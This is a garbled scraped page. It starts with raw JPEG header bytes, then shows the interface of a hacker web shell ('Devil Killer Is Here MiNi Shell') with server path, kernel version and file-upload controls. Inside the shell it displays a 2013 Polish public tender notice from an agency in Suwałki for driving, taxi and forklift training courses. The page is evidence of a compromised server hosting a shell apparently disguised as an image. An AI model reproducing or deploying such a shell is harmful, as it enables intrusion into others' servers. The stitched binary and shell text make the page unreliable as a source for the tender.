JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130123/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130123/32456-N-2013.html

<p class="kh_header"><b>Suwałki: Przedmiotem zamówienia są usługi organizacji i przeprowadzenie szkoleń i kursów zawodowych na potrzeby projektu pn.  NOVA - program wsparcia procesów adaptacyjnych i modernizacyjnych na suwalszczyźnie (WND-POKL.08.01.02-20-004/12)</b><br>
<b>Numer ogłoszenia: 32456 - 2013; data zamieszczenia: 23.01.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Agencja Rozwoju Regionalnego ARES S.A. w Suwałkach , ul. Teofila Noniewicza 42A, 16-400 Suwałki, woj. podlaskie, tel. 87 5666106, faks 87 5667497.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.ares.suwalki.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Przedmiotem zamówienia są usługi organizacji i przeprowadzenie szkoleń i kursów zawodowych na potrzeby projektu pn.  NOVA - program wsparcia procesów adaptacyjnych i modernizacyjnych na suwalszczyźnie (WND-POKL.08.01.02-20-004/12).</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zadanie 1: usługa organizacji i przeprowadzenie szkolenia/kursu pn. Prawo jazdy kat. D w ramach projektu NOVA - program wsparcia procesów adaptacyjnych i modernizacyjnych na suwalszczyźnie.Zadanie 2: Usługa organizacji i przeprowadzenie jednego szkolenia/kursu  metodą wykładową lub e-learningową (w siedzibie Wykonawcy) Kwalifikacja wstępna przyśpieszona do przewozu osób w transporcie zbiorowym w zakresie kategorii D1, D1+E, D, D+E.Zadanie 3: Usługa organizacji i przeprowadzenie szkolenia/kursu Transport drogowy taksówką uprawniającą do wykonywania działalności gospodarczej w zakresie przewozu osób taksówką.Zadanie 4: Usługa organizacji i przeprowadzenia szkolenia/kursu Operator wózków widłowych z wymianą butli gazowych..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8, 80.41.12.00-0.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> .</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek zostanie spełniony, jeżeli Wykonawca: Dotyczy zadania 1, 2, 3: jest wpisany do rejestru przedsiębiorców prowadzących ośrodek szkolenia kierowców zgodnie z art. 39g ustawy z dnia 6 września 2001 r. o transporcie drogowym (Dz. U. 2012, poz. 1265) oraz art. 28 ustawy z dnia 5 stycznia 2011 r. o kierujących pojazdami (Dz. U. 2011, Nr 30, poz. 151 z późn. zm.). 
Dotyczy zadania 4:Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Opis sposobu dokonywania oceny spełnienia warunku: weryfikacja nastąpi na podstawie złożonego wraz z ofertą oświadczenia Wykonawcy wg załącznika nr 2 do SIWZ.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dotyczy zadania 1, 2, 3, 4:Warunek zostanie spełniony, jeżeli Wykonawca: wykaże, że w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał co najmniej 2 usługi polegające na organizacji i przeprowadzeniu szkoleń dla łącznej liczby osób określonej w szczegółowym opisie przedmiotu zamówienia dla każdego zadania, w zakresie odpowiadającym rodzajem przedmiotowi zamówienia  - o wartości nie mniejszej niż cena brutto złożonej oferty na poszczególną część zamówienia, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców -  (załącznik nr 7 do SIWZ) 
oraz - załączy dokumenty potwierdzające, że usługi zostały wykonane należycie, a w przypadku świadczeń okresowych lub ciągłych - są wykonywane należycie.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony jeżeli Wykonawca:Dotyczy zadania 1 i 2: wykaże, że będzie dysponował pomieszczeniem (salą wykładową) adekwatnym do ilości uczestników kursu, spełniającym wymagania obowiązujących przepisów prawa, tj. Rozporządzenia Ministra Transportu, Budownictwa i Gospodarki Morskiej z dnia 13 lipca 2012 r. w sprawie szkolenia osób ubiegających się o uprawnienia do kierowania pojazdami, instruktorów i wykładowców (Dz. U. 2012, poz. 1019), dla potrzeb realizacji zajęć teoretycznych, oraz
- wykaże, że będzie dysponował co najmniej 1 pojazdem dopuszczonym do ruchu, przystosowanymi do nauki jazdy, spełniającymi wymagania określone w obowiązujących przepisach, tj. Rozporządzenia Ministra Infrastruktury z dnia 31 grudnia 2002 r.  w sprawie warunków technicznych pojazdów oraz zakresu ich niezbędnego wyposażenia (Dz. U. 2003 r. Nr 32, poz. 262, z późn. zm.), w zakresie kategorii prawa jazdy stanowiącej przedmiot zamówienia, oraz
-  wykaże, że będzie dysponował placem manewrowym spełniającym wymagania obowiązujących przepisów prawa, tj. Rozporządzenia Ministra Transportu, Budownictwa i Gospodarki Morskiej z dnia 13 lipca 2012 r. w sprawie szkolenia osób ubiegających się o uprawnienia do kierowania pojazdami, instruktorów i wykładowców (Dz. U. 2012, poz. 1019
(załącznik nr 6 do SIWZ).
Dotyczy zadania  3:wykaże, że będzie dysponował pomieszczeniem (salą wykładową) adekwatnym do ilości uczestników kursu, spełniającym wymagania obowiązujących przepisów prawa, tj. Rozporządzenia Ministra Transportu, Budownictwa i Gospodarki Morskiej z dnia 13 lipca 2012 r. w sprawie szkolenia osób ubiegających się o uprawnienia do kierowania pojazdami, instruktorów i wykładowców (Dz. U. 2012, poz. 1019), dla potrzeb realizacji zajęć teoretycznych.
(załącznik nr 6 do SIWZ).
Dotyczy zadania  4:wykaże, że będzie dysponował pomieszczeniem (salą wykładową) adekwatnym do ilości uczestników kursu, spełniającym wymagania obowiązujących przepisów prawa w zakresie bezpiecznych i higienicznych warunków pracy i nauki, dla potrzeb realizacji zajęć teoretycznych oraz - wykaże, że będzie dysponował co najmniej jednym wózkiem widłowym spełniającym wymagania określone w przepisach w sprawie warunków technicznych, tj. Rozporządzenia Ministra Gospodarki, Pracy i Polityki Społecznej z dnia 29 października 2003 r. w sprawie warunków technicznych dozoru technicznego w zakresie eksploatacji niektórych urządzeń transportu bliskiego (Dz. U. 2003 r., Nr 193, poz. 1890, z póżn. zm.) oraz w zakresie bezpiecznej wymiany butli gazowych stanowiącej przedmiot zamówienia, oraz - wykaże, że będzie dysponował placem manewrowym (załącznik nr 6 do SIWZ).</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony jeżeli Wykonawca:Dotyczy zadania 1, 2, 3:- wykaże, że będzie dysponował co najmniej 1 osobą posiadającą wymagane przepisami prawa tj. ustawy z dnia 5 stycznia 2011 r. o kierujących pojazdami (Dz. U. 2011, Nr 30, poz. 151 z późn. zm.)  uprawnienia niezbędne dla realizacji danego rodzaju usługi szkoleniowej od minimum 2 lat i posiadającymi doświadczenie w postaci przeszkolenia w okresie ostatnich 3 lat przed upływem terminu składania ofert łącznej liczby osób określonej w szczegółowym opisie przedmiotu zamówienia (dla danej usługi szkoleniowej), w zakresie odpowiadającym rodzajem przedmiotowi zamówienia  (załącznik nr 8 do SIWZ), Dotyczy zadania 4: wykaże, że będzie dysponował co najmniej 1 osobą posiadającą wymagane przepisami prawa uprawnienia niezbędne dla realizacji danego rodzaju usługi szkoleniowej (tj. instruktora, który posiada uprawnienia do obsługi odpowiedniego rodzaju wózka i ukończył w Ośrodku Doskonalenia Kadr w Mysłowicach lub uprawnionej jednostce terenowej, seminarium, po którym uzyskał uprawnienia i program kursu do szkolenia pracowników obsługujących wózki jezdniowe) od minimum 2 lat i posiadającymi doświadczenie w postaci przeszkolenia w okresie ostatnich 3 lat przed upływem terminu składania ofert łącznej liczby osób określonej w szczegółowym opisie przedmiotu zamówienia (dla danej usługi szkoleniowej), w zakresie odpowiadającym rodzajem przedmiotowi zamówienia  (załącznik nr 8 do SIWZ).</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Dotyczy zadania 1, 2,3, 4:Zamawiający nie wyznacza szczegółowego warunku w tym zakresie. Opis sposobu dokonywania oceny spełnienia warunku: weryfikacja nastąpi na podstawie złożonego wraz z ofertą oświadczenia Wykonawcy wg załącznika nr 2 do SIWZ.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz narządzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu realizacji zamówienia wraz z informacją o podstawie  dysponowania tymi zasobami</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Stosownie do art. 144 ustawy, Zamawiający zastrzega sobie możliwość dokonania zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której wybrano Wykonawcę, polegającej na:zmianie osób wyznaczonych do uzgodnień i koordynacji przedmiotu niniejszej umowy,sprostowania oczywistych omyłek pisarskich i rachunkowych,zmianie liczebności uczestników na mniejszą (w przypadku nie podjęcia szkolenia przez osobę skierowaną na szkolenie, rezygnacji kandydata-tki ze szkolenia mimo wcześniejszych deklaracji uczestnictwa w szkoleniu lub niestawienia się kandydata-tki na szkolenie pomimo wezwania Zamawiającego),zmianie terminu realizacji zamówienia z przyczyn niezależnych od Zamawiającego jak również Wykonawcy, w przypadku wystąpienia zdarzeń losowych.
Konieczności zmiany terminu realizacji przedmiotu umowy z przyczyn niezawinionych przez strony nie może spowodować zmiany ceny wynikającej z oferty, na podstawie której był dokonany wybór Wykonawcy. Ponadto  Zamawiający przewiduje możliwość zmiany umowy w przypadku:gdy nastąpi zmiana powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizacje przedmiotu umowy; gdy konieczność wprowadzenia zmian będzie następstwem zmian wytycznych lub zaleceń Instytucji, która przyznała środki na sfinansowanie umowy;zaistnienia siły wyższej (powódź, pożar, zamieszki, strajki, ataki terrorystyczne, przerwy w dostawie energii elektrycznej) mającej wpływ na realizację umowy. Zmiana postanowień zawartej umowy może nastąpić wyłącznie w przypadkach przewidzianych ustawą oraz postanowieniami niniejszej Specyfikacji istotnych warunków zamówienia, za zgodą obu Stron wyrażoną na piśmie w formie aneksu do umowy, pod rygorem nieważności takiej zmiany.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.ares.suwalki.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Agencja Rozwoju Regionalnego ARES S.A. w Suwałkach16-400 Suwałki, ul. Noniewicza 42A, godziny urzędowania: 07.00-15.00 od poniedziałku do piątku..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 31.01.2013 godzina 08:00, miejsce: Agencja Rozwoju Regionalnego ARES S.A. w Suwałkach,16-400 Suwałki, ul. Noniewicza 42A, Sekretariat.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> NOVA - program wsparcia procesów adaptacyjnych i modernizacyjnych na suwalszczyźnie(WND-POKL.08.01.02-20-004/12). Projekt współfinansowany ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego, wdrożony i realizowany w ramach Programu Operacyjnego Kapitał Ludzki 2007-2013, Priorytetu VIII. Regionalne kadry gospodarki, Działania 8.1. Rozwój pracowników i przedsiębiorstw w regionie, Poddziałania 8.1.2. Wsparcie procesów adaptacyjnych i modernizacyjnych w regionie..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Usługa organizacji i przeprowadzenie szkolenia kursu pn. Prawo jazdy kat. D w ramach projektu NOVA - program wsparcia procesów adaptacyjnych i modernizacyjnych na suwalszczyźnie..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Liczba osób do przeszkolenia: 1 osoba. Pożądany termin szkolenia: w okresie od dnia zawarcia umowy do 10 marca 2013 r.Szkolenie musi być przeprowadzone w oparciu o przepisy Rozporządzenia Ministra Transportu, Budownictwa i Gospodarki Morskiej z dnia 13 lipca 2012 r. w sprawie szkolenia osób ubiegających się o uprawnienia do kierowania pojazdami, instruktorów i wykładowców (Dz. U. 2012, poz. 1019).  
Ilość godzin szkolenia przypadająca na 1 uczestnika:20 godz. zajęć teoretycznych	-1 osoba,60 godz. zajęć praktycznych -1 osoba (uczestniczka projektu posiadająca prawo jazdy kat. B)
Zajęcia teoretyczne odbywać się powinny pomiędzy godziną 8.00, a 17.00. Zajęcia praktyczne odbywać się będą wg grafiku ustalonego z uczestniczką kursu.Wykonawca zapewni:Każdorazowo podczas zajęć teoretycznych przerwę kawową (kawa, herbata, cukier, śmietanka) oraz ciepły posiłek (składający się z min. drugiego dania) w trakcie zajęć teoretycznych, jeżeli ich wymiar dzienny przekracza 5 godz. dydaktycznych, Badania lekarskie dla uczestniczki kursu zawodowego,Koszt jednokrotnego egzaminu przeprowadzonego przez Wojewódzki Ośrodek Ruchu Drogowego,warunki lokalowe zgodne z w/w rozporządzeniem,Zaplecze techniczne (tj. przede wszystkim: autobus, plac manewrowy)dostęp do pomieszczeń sanitarnych w budynku, gdzie odbywają się zajęcia (WC, umywalka, niezbędne środki czystości),
oznaczenia pomieszczeń, w których będą odbywać się szkolenia, materiałów szkoleniowych oraz wszelkich innych dokumentów związanych z realizacją przedmiotu zamówienia logotypami POKL i UE.Miejsce szkolenia:zajęcia teoretyczne: na terenie powiatu augustowskiego, zajęcia praktyczne muszą być przeprowadzone w powiecie: augustowskim, i/lub suwalskim i/lub Miasta Suwałki). Uczestniczka szkolenia powinna otrzymać na własność: aktualny podręcznik (lub skrypt) w zakresie   przedmiotu zamówienia, ćwiczenia z testami egzaminacyjnymi w zakresie kategorii D prawa jazdy.Sposób sprawdzania efektów szkolenia: egzamin wewnętrzny teoretyczny i praktyczny zgodnie z rozporządzeniem, o którym mowa w pkt. 3. Wykonawca zamówienia sporządzi protokół z przebiegu egzaminu wewnętrznego.Po ukończeniu szkolenia uczestniczka otrzyma zaświadczenie zgodnie z rozporządzeniem, o którym mowa w pkt. 3. Wykonawca jest zobowiązany do organizacji i poniesienia kosztów wymaganych badań lekarskich.
Wykonawca jest zobowiązany do opłacenia pierwszego egzaminu państwowego dla osoby, która ukończyła szkolenie i zdały egzamin wewnętrzny.Wykonawca zobowiązany jest do rejestracji instytucji i przedmiotu zamówienia na portalu www.inwestycjawkadry.info.pl..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.41.12.00-0, 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 10.03.2013.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Usługa organizacji i przeprowadzenie jednego szkolenia/kursu  metodą wykładową lub e-learningową (w siedzibie Wykonawcy) Kwalifikacja wstępna przyśpieszona do przewozu osób w transporcie zbiorowym w zakresie kategorii D1, D1+E, D, D+E..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Liczba osób do przeszkolenia: 2 osoby.Pożądany termin szkolenia: w okresie od dnia zawarcia umowy do 15 marca 2013 r.
Szkolenie musi być przeprowadzone w oparciu o przepisy: ustawy z dnia 6 września 2001 r. o transporcie drogowym (Dz. U. 2012 r., poz. 1265) oraz Rozporządzenia Ministra infrastruktury z dnia 1 kwietnia 2010 r. w sprawie szkolenia kierowców wykonujących przewóz drogowy (Dz. U. z 2010 r. Nr 53, poz. 314 z późn. zm.).
Ilość godzin szkolenia przypadająca na 1 uczestnika:1) część podstawowa - teoretyczna trwającą minimum 97 godzin;część specjalistyczna prowadzona w formie:zajęć teoretycznych, trwających minimum 33 godziny,zajęć praktycznych w ruchu drogowym, podczas których osoba szkolona powinna odbyć minimum 8 godzin jazdy indywidualnej, oraz zajęć praktycznych z jazdy w warunkach specjalnych, podczas których osoba szkolona powinna odbyć minimum 2 godziny jazdy indywidualnej.
